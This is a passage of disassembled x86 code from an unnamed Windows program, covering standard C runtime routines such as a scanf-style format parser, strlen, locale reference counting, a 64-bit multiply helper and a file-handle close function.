loc_4159E4: ; CODE XREF: sub_41554C+492�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1CC], edi
cmp byte ptr [edi], 5Eh
jnz short loc_415A01
inc edi
mov [ebp+var_1CC], edi
or [ebp+var_49], 0FFh
loc_415A01: ; CODE XREF: sub_41554C+4A8�j
mov ebx, [ebp+var_20]
test ebx, ebx
jnz short loc_415A59
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_415A59
; ---------------------------------------------------------------------------
loc_415A21: ; DATA XREF: .rdata:stru_427878�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_415A25: ; DATA XREF: .rdata:stru_427878�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
push 20h
call sub_41344D
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz short loc_415A45
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_415FB9
; ---------------------------------------------------------------------------
loc_415A45: ; CODE XREF: sub_41554C+4EE�j
mov [ebp+var_24], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1CC]
mov ebx, [ebp+var_20]
loc_415A59: ; CODE XREF: sub_41554C+4BA�j
; sub_41554C+4D3�j
push 20h
push 0
push ebx
call sub_41ADD0
add esp, 0Ch
cmp [ebp+var_68], 7Bh
jnz short loc_415AE0
cmp byte ptr [edi], 5Dh
jnz short loc_415AE0
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_415AE3
; ---------------------------------------------------------------------------
loc_415A7A: ; CODE XREF: sub_41554C+59B�j
inc edi
cmp al, 2Dh
jnz short loc_415ACA
test dl, dl
jz short loc_415ACA
mov cl, [edi]
cmp cl, 5Dh
jz short loc_415ACA
inc edi
cmp dl, cl
jnb short loc_415A93
mov al, cl
jmp short loc_415A97
; ---------------------------------------------------------------------------
loc_415A93: ; CODE XREF: sub_41554C+541�j
mov al, dl
mov dl, cl
loc_415A97: ; CODE XREF: sub_41554C+545�j
cmp dl, al
ja short loc_415AC6
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D0], eax
loc_415AAB: ; CODE XREF: sub_41554C+578�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D0]
jnz short loc_415AAB
loc_415AC6: ; CODE XREF: sub_41554C+54D�j
xor dl, dl
jmp short loc_415AE3
; ---------------------------------------------------------------------------
loc_415ACA: ; CODE XREF: sub_41554C+531�j
; sub_41554C+535�j ...
mov [ebp+var_39], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_415AE0: ; CODE XREF: sub_41554C+51E�j
; sub_41554C+523�j
mov dl, [ebp+var_39]
loc_415AE3: ; CODE XREF: sub_41554C+52C�j
; sub_41554C+57C�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_415A7A
test al, al
jz loc_415FB9
mov ebx, [ebp+var_64]
cmp [ebp+var_68], 7Bh
jnz short loc_415AFD
mov [ebp+arg_4], edi
loc_415AFD: ; CODE XREF: sub_41554C+5AC�j
mov edi, [ebp+var_68]
loc_415B00: ; CODE XREF: sub_41554C+42D�j
; sub_41554C+437�j
mov esi, ebx
dec [ebp+var_30]
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_415B18
push [ebp+arg_0]
push [ebp+var_28]
call sub_41AC6F
pop ecx
pop ecx
loc_415B18: ; CODE XREF: sub_41554C+5BD�j
; sub_41554C+754�j ...
cmp [ebp+var_44], 0
jz short loc_415B2C
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz loc_415CBE
loc_415B2C: ; CODE XREF: sub_41554C+5D0�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov [ebp+var_28], eax
cmp eax, 0FFFFFFFFh
jz loc_415CAB
cmp edi, 63h
jz short loc_415B8C
cmp edi, 73h
jnz short loc_415B5C
cmp eax, 9
jl short loc_415B57
cmp eax, 0Dh
jle short loc_415B5C
loc_415B57: ; CODE XREF: sub_41554C+604�j
cmp eax, 20h
jnz short loc_415B8C
loc_415B5C: ; CODE XREF: sub_41554C+5FF�j
; sub_41554C+609�j
cmp edi, 7Bh
jnz loc_415CAB
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_20]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_49]
xor ecx, edi
test edx, ecx
jz loc_415CAB
mov edi, [ebp+var_68]
loc_415B8C: ; CODE XREF: sub_41554C+5FA�j
; sub_41554C+60E�j
cmp [ebp+var_4B], 0
jnz loc_415CA5
cmp [ebp+var_4D], 0
jz loc_415C9A
mov [ebp+var_1D4], al
movzx eax, al
mov ecx, off_42CE30
test byte ptr [ecx+eax*2+1], 80h
jz short loc_415BC7
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov [ebp+var_1D3], al
loc_415BC7: ; CODE XREF: sub_41554C+668�j
push dword_42D08C
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_1D8]
push eax
call sub_41AD9B
add esp, 0Ch
mov ax, [ebp+var_1D8]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_415C9D
; ---------------------------------------------------------------------------
loc_415BF4: ; CODE XREF: sub_41554C+27F�j
cmp ebx, 2Bh
jnz short loc_415C17
loc_415BF9: ; CODE XREF: sub_41554C+289�j
dec [ebp+var_48]
jnz short loc_415C08
test ecx, ecx
jz short loc_415C08
mov [ebp+var_4C], 1
jmp short loc_415C17
; ---------------------------------------------------------------------------
loc_415C08: ; CODE XREF: sub_41554C+6B0�j
; sub_41554C+6B4�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
loc_415C17: ; CODE XREF: sub_41554C+6AB�j
; sub_41554C+6BA�j
cmp ebx, 30h
jnz loc_415D2C
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
cmp bl, 78h
jz short loc_415C74
cmp bl, 58h
jz short loc_415C74
mov [ebp+var_40], 1
cmp edi, 78h
jz short loc_415C5B
cmp [ebp+var_44], 0
jz short loc_415C53
dec [ebp+var_48]
jnz short loc_415C53
inc [ebp+var_4C]
loc_415C53: ; CODE XREF: sub_41554C+6FD�j
; sub_41554C+702�j
push 6Fh
loc_415C55: ; CODE XREF: sub_41554C+74C�j
pop edi
jmp loc_415D2C
; ---------------------------------------------------------------------------
loc_415C5B: ; CODE XREF: sub_41554C+6F7�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_415C6C
push esi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_415C6C: ; CODE XREF: sub_41554C+715�j
push 30h
pop ebx
jmp loc_415D29
; ---------------------------------------------------------------------------
loc_415C74: ; CODE XREF: sub_41554C+6E6�j
; sub_41554C+6EB�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
cmp [ebp+var_44], 0
jz short loc_415C96
sub [ebp+var_48], 2
cmp [ebp+var_48], 1
jge short loc_415C96
inc [ebp+var_4C]
loc_415C96: ; CODE XREF: sub_41554C+73B�j
; sub_41554C+745�j
push 78h
jmp short loc_415C55
; ---------------------------------------------------------------------------
loc_415C9A: ; CODE XREF: sub_41554C+64E�j
mov [ebx], al
inc ebx
loc_415C9D: ; CODE XREF: sub_41554C+6A3�j
mov [ebp+var_64], ebx
jmp loc_415B18
; ---------------------------------------------------------------------------
loc_415CA5: ; CODE XREF: sub_41554C+644�j
inc esi
jmp loc_415B18
; ---------------------------------------------------------------------------
loc_415CAB: ; CODE XREF: sub_41554C+5F1�j
; sub_41554C+613�j ...
dec [ebp+var_30]
cmp eax, 0FFFFFFFFh
jz short loc_415CBE
push [ebp+arg_0]
push eax
call sub_41AC6F
pop ecx
pop ecx
loc_415CBE: ; CODE XREF: sub_41554C+5DA�j
; sub_41554C+765�j
cmp esi, ebx
jz loc_415FB9
cmp [ebp+var_4B], 0
jnz loc_415F2D
inc [ebp+var_34]
cmp [ebp+var_68], 63h
jz loc_415F2D
mov eax, [ebp+var_64]
cmp [ebp+var_4D], 0
jz short loc_415CEF
and word ptr [eax], 0
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_415CEF: ; CODE XREF: sub_41554C+798�j
and byte ptr [eax], 0
jmp loc_415F2D
; ---------------------------------------------------------------------------
loc_415CF7: ; CODE XREF: sub_41554C+441�j
mov [ebp+var_4F], 1
loc_415CFB: ; CODE XREF: sub_41554C+221�j
; sub_41554C+233�j ...
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_415D09
mov [ebp+var_4A], 1
jmp short loc_415D0E
; ---------------------------------------------------------------------------
loc_415D09: ; CODE XREF: sub_41554C+7B5�j
cmp ebx, 2Bh
jnz short loc_415D2C
loc_415D0E: ; CODE XREF: sub_41554C+7BB�j
dec [ebp+var_48]
jnz short loc_415D1D
test ecx, ecx
jz short loc_415D1D
mov [ebp+var_4C], 1
jmp short loc_415D2C
; ---------------------------------------------------------------------------
loc_415D1D: ; CODE XREF: sub_41554C+7C5�j
; sub_41554C+7C9�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
loc_415D29: ; CODE XREF: sub_41554C+723�j
mov [ebp+var_28], ebx
loc_415D2C: ; CODE XREF: sub_41554C+6CE�j
; sub_41554C+70A�j ...
cmp [ebp+var_54], 0
jz loc_415E31
cmp [ebp+var_4C], 0
jnz loc_415E0F
loc_415D40: ; CODE XREF: sub_41554C+8BA�j
cmp edi, 78h
jz short loc_415D8B
cmp edi, 70h
jz short loc_415D8B
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jz short loc_415DBC
cmp edi, 6Fh
jnz short loc_415D74
cmp ebx, 38h
jge short loc_415DBC
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp short loc_415DBF
; ---------------------------------------------------------------------------
loc_415D74: ; CODE XREF: sub_41554C+80C�j
push 0
push 0Ah
push [ebp+var_58]
push [ebp+var_5C]
call sub_4162D0
mov [ebp+var_5C], eax
mov [ebp+var_58], edx
jmp short loc_415DBF
; ---------------------------------------------------------------------------
loc_415D8B: ; CODE XREF: sub_41554C+7F7�j
; sub_41554C+7FC�j
push ebx
call sub_41ABF6
pop ecx
test eax, eax
jz short loc_415DBC
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_415DBF
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_415DBF
; ---------------------------------------------------------------------------
loc_415DBC: ; CODE XREF: sub_41554C+807�j
; sub_41554C+811�j ...
inc [ebp+var_4C]
loc_415DBF: ; CODE XREF: sub_41554C+826�j
; sub_41554C+83D�j ...
cmp [ebp+var_4C], 0
jnz short loc_415DF1
inc [ebp+var_40]
lea eax, [ebx-30h]
cdq
add [ebp+var_5C], eax
adc [ebp+var_58], edx
cmp [ebp+var_44], 0
jz short loc_415DE3
dec [ebp+var_48]
jnz short loc_415DE3
mov [ebp+var_4C], 1
jmp short loc_415E02
; ---------------------------------------------------------------------------
loc_415DE3: ; CODE XREF: sub_41554C+88A�j
; sub_41554C+88F�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
jmp short loc_415E02
; ---------------------------------------------------------------------------
loc_415DF1: ; CODE XREF: sub_41554C+877�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_415E02
push esi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_415E02: ; CODE XREF: sub_41554C+895�j
; sub_41554C+8A3�j ...
cmp [ebp+var_4C], 0
jz loc_415D40
mov [ebp+var_28], ebx
loc_415E0F: ; CODE XREF: sub_41554C+7EE�j
cmp [ebp+var_4A], 0
jz loc_415EEB
mov eax, [ebp+var_5C]
neg eax
mov ecx, [ebp+var_58]
adc ecx, 0
neg ecx
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp loc_415EEB
; ---------------------------------------------------------------------------
loc_415E31: ; CODE XREF: sub_41554C+7E4�j
cmp [ebp+var_4C], 0
jnz loc_415EE2
loc_415E3B: ; CODE XREF: sub_41554C+98D�j
cmp edi, 78h
jz short loc_415E6D
cmp edi, 70h
jz short loc_415E6D
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jz short loc_415E8F
cmp edi, 6Fh
jnz short loc_415E60
cmp ebx, 38h
jge short loc_415E8F
shl [ebp+var_38], 3
jmp short loc_415E92
; ---------------------------------------------------------------------------
loc_415E60: ; CODE XREF: sub_41554C+907�j
mov eax, [ebp+var_38]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_38], eax
jmp short loc_415E92
; ---------------------------------------------------------------------------
loc_415E6D: ; CODE XREF: sub_41554C+8F2�j
; sub_41554C+8F7�j
push ebx
call sub_41ABF6
pop ecx
test eax, eax
jz short loc_415E8F
shl [ebp+var_38], 4
push ebx
call sub_41ABBC
pop ecx
test eax, eax
jnz short loc_415E92
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_415E92
; ---------------------------------------------------------------------------
loc_415E8F: ; CODE XREF: sub_41554C+902�j
; sub_41554C+90C�j ...
inc [ebp+var_4C]
loc_415E92: ; CODE XREF: sub_41554C+912�j
; sub_41554C+91F�j ...
cmp [ebp+var_4C], 0
jnz short loc_415EC4
inc [ebp+var_40]
mov eax, [ebp+var_38]
lea eax, [eax+ebx-30h]
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_415EB6
dec [ebp+var_48]
jnz short loc_415EB6
mov [ebp+var_4C], 1
jmp short loc_415ED5
; ---------------------------------------------------------------------------
loc_415EB6: ; CODE XREF: sub_41554C+95D�j
; sub_41554C+962�j
inc [ebp+var_30]
mov edx, esi
call sub_415536
mov ebx, eax
jmp short loc_415ED5
; ---------------------------------------------------------------------------
loc_415EC4: ; CODE XREF: sub_41554C+94A�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_415ED5
push esi
push ebx
call sub_41AC6F
pop ecx
pop ecx
loc_415ED5: ; CODE XREF: sub_41554C+968�j
; sub_41554C+976�j ...
cmp [ebp+var_4C], 0
jz loc_415E3B
mov [ebp+var_28], ebx
loc_415EE2: ; CODE XREF: sub_41554C+8E9�j
cmp [ebp+var_4A], 0
jz short loc_415EEB
neg [ebp+var_38]
loc_415EEB: ; CODE XREF: sub_41554C+8C7�j
; sub_41554C+8E0�j ...
cmp edi, 46h
jnz short loc_415EF4
and [ebp+var_40], 0
loc_415EF4: ; CODE XREF: sub_41554C+9A2�j
cmp [ebp+var_40], 0
jz loc_415FB9
cmp [ebp+var_4B], 0
jnz short loc_415F2D
inc [ebp+var_34]
mov ebx, [ebp+var_64]
mov eax, [ebp+var_38]
loc_415F0D: ; CODE XREF: sub_41554C+259�j
cmp [ebp+var_54], 0
jz short loc_415F20
mov eax, [ebp+var_5C]
mov [ebx], eax
mov eax, [ebp+var_58]
mov [ebx+4], eax
jmp short loc_415F2D
; ---------------------------------------------------------------------------
loc_415F20: ; CODE XREF: sub_41554C+9C5�j
cmp [ebp+var_4F], 0
jz short loc_415F2A
mov [ebx], eax
jmp short loc_415F2D
; ---------------------------------------------------------------------------
loc_415F2A: ; CODE XREF: sub_41554C+9D8�j
mov [ebx], ax
loc_415F2D: ; CODE XREF: sub_41554C+25F�j
; sub_41554C+3F1�j ...
inc [ebp+var_29]
inc [ebp+arg_4]
jmp short loc_415F9D
; ---------------------------------------------------------------------------
loc_415F35: ; CODE XREF: sub_41554C+90�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
mov ebx, eax
mov [ebp+var_28], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_415F86
movzx eax, bl
mov ecx, off_42CE30
test byte ptr [ecx+eax*2+1], 80h
jz short loc_415F9D
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_415F9A
cmp eax, 0FFFFFFFFh
jz short loc_415F86
push [ebp+arg_0]
push eax
call sub_41AC6F
pop ecx
pop ecx
loc_415F86: ; CODE XREF: sub_41554C+A02�j
; sub_41554C+A2D�j
cmp ebx, 0FFFFFFFFh
loc_415F89: ; CODE XREF: sub_41554C+471�j
jz short loc_415FB9
push [ebp+arg_0]
push [ebp+var_28]
call sub_41AC6F
pop ecx
pop ecx
jmp short loc_415FB9
; ---------------------------------------------------------------------------
loc_415F9A: ; CODE XREF: sub_41554C+A28�j
dec [ebp+var_30]
loc_415F9D: ; CODE XREF: sub_41554C+9E7�j
; sub_41554C+A12�j
cmp [ebp+var_28], 0FFFFFFFFh
jnz loc_41557A
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 25h
jnz short loc_415FB9
cmp byte ptr [eax+1], 6Eh
jz loc_41557A
loc_415FB9: ; CODE XREF: sub_41554C+35�j
; sub_41554C+3E7�j ...
cmp [ebp+var_24], 1
jnz short loc_415FC8
push [ebp+var_20]
call sub_412FE4
pop ecx
loc_415FC8: ; CODE XREF: sub_41554C+A71�j
mov eax, [ebp+var_34]
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_415FDD
test eax, eax
jnz short loc_415FDD
cmp [ebp+var_29], al
jnz short loc_415FDD
or eax, 0FFFFFFFFh
loc_415FDD: ; CODE XREF: sub_41554C+A83�j
; sub_41554C+A87�j ...
lea esp, [ebp-1E4h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_4182D6
call __SEH_epilog
retn
sub_41554C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416000 proc near ; CODE XREF: sub_412D93+17�p
; sub_414004+D2�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_416030
loc_41600C: ; CODE XREF: sub_416000+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_416063
test ecx, 3
jnz short loc_41600C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_416030: ; CODE XREF: sub_416000+A�j
; sub_416000+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_416030
mov eax, [ecx-4]
test al, al
jz short loc_416081
test ah, ah
jz short loc_416077
test eax, 0FF0000h
jz short loc_41606D
test eax, 0FF000000h
jz short loc_416063
jmp short loc_416030
; ---------------------------------------------------------------------------
loc_416063: ; CODE XREF: sub_416000+13�j
; sub_416000+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41606D: ; CODE XREF: sub_416000+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_416077: ; CODE XREF: sub_416000+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_416081: ; CODE XREF: sub_416000+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_416000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41608B proc near ; CODE XREF: sub_412EBA+2A�p
; sub_41364A+37�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
cmp ecx, 100h
mov ecx, [ebp+arg_0]
ja short loc_4160A9
mov ecx, [ecx+48h]
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4160FD
; ---------------------------------------------------------------------------
loc_4160A9: ; CODE XREF: sub_41608B+13�j
push esi
mov edx, eax
sar edx, 8
push edi
mov edi, [ecx+48h]
movzx esi, dl
test byte ptr [edi+esi*2+1], 80h
pop edi
pop esi
jz short loc_4160CE
and [ebp+var_2], 0
push 2
mov [ebp+var_3], al
mov [ebp+var_4], dl
pop eax
jmp short loc_4160D8
; ---------------------------------------------------------------------------
loc_4160CE: ; CODE XREF: sub_41608B+32�j
and [ebp+var_3], 0
mov [ebp+var_4], al
xor eax, eax
inc eax
loc_4160D8: ; CODE XREF: sub_41608B+41�j
push 1
push dword ptr [ecx+14h]
push dword ptr [ecx+4]
lea ecx, [ebp+arg_4+2]
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41AF01
add esp, 1Ch
test eax, eax
jnz short loc_4160F9
leave
retn
; ---------------------------------------------------------------------------
loc_4160F9: ; CODE XREF: sub_41608B+6A�j
movzx eax, word ptr [ebp+arg_4+2]
loc_4160FD: ; CODE XREF: sub_41608B+1C�j
and eax, [ebp+arg_8]
leave
retn
sub_41608B endp
; =============== S U B R O U T I N E =======================================
sub_416102 proc near ; CODE XREF: sub_4161CC+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+3Ch]
push edi
xor edi, edi
cmp eax, dword_47A148
jz short loc_416178
cmp eax, edi
jz short loc_416178
mov eax, [esi+2Ch]
cmp [eax], edi
jnz short loc_416178
mov eax, [esi+34h]
cmp eax, edi
jz short loc_416143
cmp [eax], edi
jnz short loc_416143
cmp eax, dword_47A2C0
jz short loc_416143
push eax
call sub_412FE4
push dword ptr [esi+3Ch]
call sub_41B2AA
pop ecx
pop ecx
loc_416143: ; CODE XREF: sub_416102+23�j
; sub_416102+27�j ...
mov eax, [esi+30h]
cmp eax, edi
jz short loc_416166
cmp [eax], edi
jnz short loc_416166
cmp eax, dword_47A2C4
jz short loc_416166
push eax
call sub_412FE4
push dword ptr [esi+3Ch]
call sub_41B24B
pop ecx
pop ecx
loc_416166: ; CODE XREF: sub_416102+46�j
; sub_416102+4A�j ...
push dword ptr [esi+2Ch]
call sub_412FE4
push dword ptr [esi+3Ch]
call sub_412FE4
pop ecx
pop ecx
loc_416178: ; CODE XREF: sub_416102+11�j
; sub_416102+15�j ...
mov eax, [esi+40h]
cmp eax, dword_47A2BC
jz short loc_41619B
cmp eax, edi
jz short loc_41619B
cmp [eax], edi
jnz short loc_41619B
push eax
call sub_412FE4
push dword ptr [esi+44h]
call sub_412FE4
pop ecx
pop ecx
loc_41619B: ; CODE XREF: sub_416102+7F�j
; sub_416102+83�j ...
mov eax, [esi+50h]
cmp eax, dword_47A144
jz short loc_4161C2
cmp eax, edi
jz short loc_4161C2
cmp [eax+0B4h], edi
jnz short loc_4161C2
push eax
call sub_41B0BB
push dword ptr [esi+50h]
call sub_412FE4
pop ecx
pop ecx
loc_4161C2: ; CODE XREF: sub_416102+A2�j
; sub_416102+A6�j ...
push esi
call sub_412FE4
pop ecx
pop edi
pop esi
retn
sub_416102 endp
; =============== S U B R O U T I N E =======================================
sub_4161CC proc near ; CODE XREF: sub_41628E+18�p
push esi
call sub_415456
mov esi, eax
mov eax, [esi+64h]
cmp eax, off_42C7BC
jz loc_416289
test eax, eax
jz short loc_416216
mov ecx, [eax+2Ch]
dec dword ptr [eax]
test ecx, ecx
jz short loc_4161F2
dec dword ptr [ecx]
loc_4161F2: ; CODE XREF: sub_4161CC+22�j
mov ecx, [eax+34h]
test ecx, ecx
jz short loc_4161FB
dec dword ptr [ecx]
loc_4161FB: ; CODE XREF: sub_4161CC+2B�j
mov ecx, [eax+30h]
test ecx, ecx
jz short loc_416204
dec dword ptr [ecx]
loc_416204: ; CODE XREF: sub_4161CC+34�j
mov ecx, [eax+40h]
test ecx, ecx
jz short loc_41620D
dec dword ptr [ecx]
loc_41620D: ; CODE XREF: sub_4161CC+3D�j
mov ecx, [eax+4Ch]
dec dword ptr [ecx+0B4h]
loc_416216: ; CODE XREF: sub_4161CC+19�j
mov ecx, off_42C7BC
mov [esi+64h], ecx
mov ecx, off_42C7BC
inc dword ptr [ecx]
mov ecx, off_42C7BC
mov ecx, [ecx+2Ch]
test ecx, ecx
jz short loc_416236
inc dword ptr [ecx]
loc_416236: ; CODE XREF: sub_4161CC+66�j
mov ecx, off_42C7BC
mov ecx, [ecx+34h]
test ecx, ecx
jz short loc_416245
inc dword ptr [ecx]
loc_416245: ; CODE XREF: sub_4161CC+75�j
mov ecx, off_42C7BC
mov ecx, [ecx+30h]
test ecx, ecx
jz short loc_416254
inc dword ptr [ecx]
loc_416254: ; CODE XREF: sub_4161CC+84�j
mov ecx, off_42C7BC
mov ecx, [ecx+40h]
test ecx, ecx
jz short loc_416263
inc dword ptr [ecx]
loc_416263: ; CODE XREF: sub_4161CC+93�j
mov ecx, off_42C7BC
mov ecx, [ecx+4Ch]
inc dword ptr [ecx+0B4h]
test eax, eax
jz short loc_416289
cmp dword ptr [eax], 0
jnz short loc_416289
cmp eax, offset dword_42C768
jz short loc_416289
push eax
call sub_416102
pop ecx
loc_416289: ; CODE XREF: sub_4161CC+11�j
; sub_4161CC+A8�j ...
mov eax, [esi+64h]
pop esi
retn
sub_4161CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41628E proc near ; CODE XREF: sub_412EBA+12�p
; sub_41364A+17�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_427A08
call __SEH_prolog
push 0Ch
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_4161CC
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4162C0
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41628E endp
; =============== S U B R O U T I N E =======================================
sub_4162C0 proc near ; CODE XREF: sub_41628E+24�p
; DATA XREF: .rdata:stru_427A08�o
push 0Ch
call sub_41686D
pop ecx
retn
sub_4162C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4162D0 proc near ; CODE XREF: sub_41554C+832�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_4162E9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4162E9: ; CODE XREF: sub_4162D0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_4162D0 endp
; =============== S U B R O U T I N E =======================================
sub_416304 proc near ; CODE XREF: sub_416387+4C�p
; sub_41BFAD+2DC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_41B76B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416352
cmp esi, 1
jz short loc_416320
cmp esi, 2
jnz short loc_416336
loc_416320: ; CODE XREF: sub_416304+15�j
push 2
call sub_41B76B
push 1
mov edi, eax
call sub_41B76B
cmp eax, edi
pop ecx
pop ecx
jz short loc_416352
loc_416336: ; CODE XREF: sub_416304+1A�j
push esi
call sub_41B76B
pop ecx
push eax
call ds:dword_41F034 ; CloseHandle
test eax, eax
jnz short loc_416352
call ds:dword_41F008 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_416354
; ---------------------------------------------------------------------------
loc_416352: ; CODE XREF: sub_416304+10�j
; sub_416304+30�j ...
xor edi, edi
loc_416354: ; CODE XREF: sub_416304+4C�j
push esi
call sub_41B6EC
mov eax, esi
sar eax, 5
mov eax, dword_47A2E0[eax*4]
and esi, 1Fh
pop ecx
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_416382
push edi
call sub_417C82
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_416384
; ---------------------------------------------------------------------------
loc_416382: ; CODE XREF: sub_416304+70�j
xor eax, eax
loc_416384: ; CODE XREF: sub_416304+7C�j
pop edi
pop esi
retn
sub_416304 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416387 proc near ; CODE XREF: sub_412F47+20�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00416406 SIZE 0000001C BYTES
push 0Ch
push offset stru_427A18
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_416406
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_416406
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_4163DE
push ebx
call sub_416304
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4163ED
; ---------------------------------------------------------------------------
loc_4163DE: ; CODE XREF: sub_416387+49�j
